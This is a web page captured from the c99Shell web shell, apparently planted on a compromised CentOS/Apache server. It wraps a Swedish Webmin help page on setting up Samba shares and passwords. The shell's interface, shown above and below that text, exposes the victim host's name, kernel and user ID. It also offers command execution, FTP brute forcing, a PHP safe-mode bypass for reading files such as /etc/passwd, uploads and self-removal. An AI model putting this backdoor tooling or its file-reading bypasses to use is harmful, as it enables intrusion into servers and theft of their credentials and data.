!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/samba/help/   drwxr-xr-x
Free 50.88 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     help.sv.html (8.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Samba-hanteraren

Denna hjälpsida är inte färdig


Introduktion

Samba är ett freeware-program som gör att PC med Windows 95 och NT ska kunna komma åt filer och skrivare på ett Unix-system som om den vore en Windows-fil/skrivarserver. I en del Unix-system, t ex RedHat Linux, följer Samba med i standardinstallationen, medan de flesta system kräver att man ladder ned och installerar det separat.

Om Samba inte finns installerat på ditt system kommer startsidan för denna modul att innehålla ett felmeddelande som innebär att systemet inte kan hitta inställningsfilen för Samba, och det kommer inte att gå att dela några filer och kataloger. Om Samba är installerat och du ändå får detta felmeddelande bör du kontrollera modulinställningarna så att Webmin letar på rätt ställe efter inställningsfilen och Samba-program.

Om Samba är ordentligt installerat kommer startsidan att innehålla en lista över alla fil- och skrivarresurser på systemet. Om Webmin har upptäckt att Samba-servern inte är igång finns det också möjlighet att starta servern via startsidan. Detta kan behöva göras om Samba inte startar vid systemstart.


Skapa en filresurs

En filresurs i Samba är en katalog som kan monteras av klient-PC. Varje resurs har ett kortnamn, t ex docs eller www, som motsvarar en katalog på Unix-systemet. Klienten använder normalt notationen \\server\resurs för att komma åt resursen.

Klicka på Skapa filresurs nedanför listan över befintliga resurser för att skapa en ny filresurs. Du får då upp ett formulär där uppgifter om den nya resursen kan skrivas in. Samba stödjer en stor mängd inställningar, men de viktigaste är:
Resursnamn Varje resurs måste ha ett namn som klienterna använder för att komma åt den. Ett specialfall är resursen Alla hemkataloger som förklaras senare.
Sökväg Katalogen som utgör resursen. Klienter som använder resursen kan endast komma åt filer i eller under katalogen.
Öppna för skrivning Här bestämmer man om klienter får skriva i filer och kataloger i denna resurs.
Åtkomst för gäster Om man tillåter gästanvändare för en resurs kan klienterna komma åt den utan att ange något lösenord. Man kan välja att inte tillåta gästanvändare, tillåta både gäst- och vanliga användare eller att tillåta endast gästanvändare.
Information om övriga resursinställningar finns i avsnittet Ytterligare inställningar nedan.

När man har skrivit in uppgifter om den nya resursen trycker man på Skapa. Resursen kommer direkt att bli tillgänglig för klienterna. Om allt är uppsatt ordentligt på ens nätverk kommer användarna att kunna använda funktionen Nätverksomgivning under Windows för att se servern och alla dess resurser. Den nyss skapade resurser kan då tilldelas en enhetsbokstav på PC:n.


Skapa en skrivarresurs

En skrivarresurs i Samba är en lokal eller annan Unix-skrivare som man vill ska vara tillgänglig även för PC-klienter. Precis som för filresurser har varje skrivarresurs ett kortnamn ( hp5si) och klienterna kommer åt den med hjälp av notationen \\server\resurs.

Man klickar på länken Skapa skrivarresurs för att skapa en ny skrivarresurs och får då upp ett liknande formulär som när man skapar filresurser. Där skriver man in uppgifter om den nya resursern. De viktigaste inställningarna för en skrivarresurs är:
Resursnamn Varje resurs måste ha ett namn som klienter använder för att komma åt den. Ett specialfall är resursen Alla skrivare som förklaras senare.
Skrivare Den Unix-skrivare som utgör resursen. Det kan vara vilken skrivare som helst, som man kan skriva till med kommandot lpr.
Sökväg Katalog för temporära skrivarfiler.
Gäståtkomst Om man tillåter gästanvändare för en resurs kan klienterna komma åt den utan att ange något lösenord. Man kan välja att inte tillåta gästanvändare, tillåta både gäst- och vanliga användare eller att tillåta endast gästanvändare.
Skrivartyp Namn på den skrivardrivrutin som ska användas. Om man skriver in ett namn som motsvarar en skrivardrivrutin på klienterna kommer användarna inte att behöva välja skrivardrivrutin när denna skrivare läggs till.

Precis som för filresurser kan man göra många fler inställningar. Så fort en skrivarresurs skapats blir den tillgänglig för klienterna. Under Windows 95 och NT kan man lägga till en skrivare med inställningen Add Printer på skrivarkontrollpanelen. När skrivaren väl lagts till kan användaren skriva ut på den som på vilken annan nätverks- eller lokal skrivare som helst.


Skapa en kopia


Ändra resurs

Man klickar på ett resursnamn i listan för att ändra uppgifter om den, och får då upp samma formulär som när resurser skapas. Man skriver in de ändringar man vill göra och trycker sedan på Spara längst ned till vänster.

Man trycker på Ta bort längst ned till höger för att ta bort en resurs. De användare som för tillfället använder resursen kommer inte att kastas ut, men det går inte att göra nya uppkopplingar.


Användare och säkerhet

För resurser där gästanvändare inte tillåts kommer Samba att begära att klienten skickar ett användarnamn och ett lösenord. Vanligen kontrolleras dessa mot Unix-användarlistan, som hålls ā jour med modulen Användarhanteraren. Samba kan också underhålla en egen lista med användarnamn och lösenord; se avsnittet Krypterade lösenord för mer information.

En del Windows-versioner tillåter inte att användaren anger ett användarnamn då en resurs efterfrågas, utan använder istället det namn som angavs då användaren "loggade in" på Windows. Om samma användarnamn används både på Windows och Unix är detta inte ett problem. Om så inte är fallet finns det två alternativ:

  1. Windows 95 och NT kan montera resurser manuellt genom att man skriver net use drive: resurs vid kommandoprompten eller att man trycker på nätverksknappen i ett filfönster och skriver in sökvägen för resursen. För båda dessa sätt gäller att resursen skrivs på formen \\server\resurs%användare, där användare är det användarnamn man vill använda för att logga in på servern.
  2. Samba kan ställas in för att söka efter den användare som hör till det lösenord som anges. Alternativet Unix-användare innebär att man kan ange de användare eller grupper som ska sökas igenom. Observera att detta inte är särskilt säkert om antalet användare som ska sökas igenom blir stort, eftersom det då är stor risk att flera användare har samma lösenord.

    Krypterade lösenord

    Vanligtvis skickas lösenord okrypterade över nätverket mellan Sambaservern och PC-klienten. Detta är inte bra av följande anledningar:
    1. Vem som helst kan tjuvlyssna på nätverket och då få tillgång till andras lösenord.
    2. De senaste versionerna av Windows 9x och NT kan inte skicka lösenord okrypterade. Om en användare då försöker komma åt Sambaservern från ett sådant system kommer den att få felmeddelandet ???. Ändringen finns från och med NT-servicepaket 3.
    Samba stödjer kryptering av lösenord, men det går inte att kontrollera de lösenord som klienterna skickar mot den vanliga Unix-lösenordsfilen eftersom det inte är samma kryptering som används. Av denna anledning måste Samba ha en egen lista över användare och lösenord.

    Så här gör man för att ställa om Samba till att acceptera krypterade lösenord:

    1. Kontrollera att Samba-versionen stödjer lösenordskryptering. Sätt inställningen Krypterade lösenord i Lösenordsinställningar till Ja. Om det inte fungerar måste en version med stöd för lösenordskryptering hämtas eller kompileras.
    2. Klicka på Omvandla Unix-användare till Samba-användare längst ned på startsidan. Man får då upp en sida där man kan välja att omvandla alla eller bara några av Unix-användarna till Samba-användare. Användarnamn, riktiga namn, UID och skal kommer att omvandlas, men inte lösenord.
    3. Använd inställningen Ändra Samba-användarlista för att skriva in lösenord. Den visar en lista över alla Samba-användare, där man kan välja den användare man vill lägga till lösenord för. För varje användare kan man sätta lösenordet till Låst (inloggning spärrad), Inget lösenord (inget lösenord behöver anges) eller det lösenord som ska anges vid inloggning.
      <-   Tillbaka till modul

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0121 ]--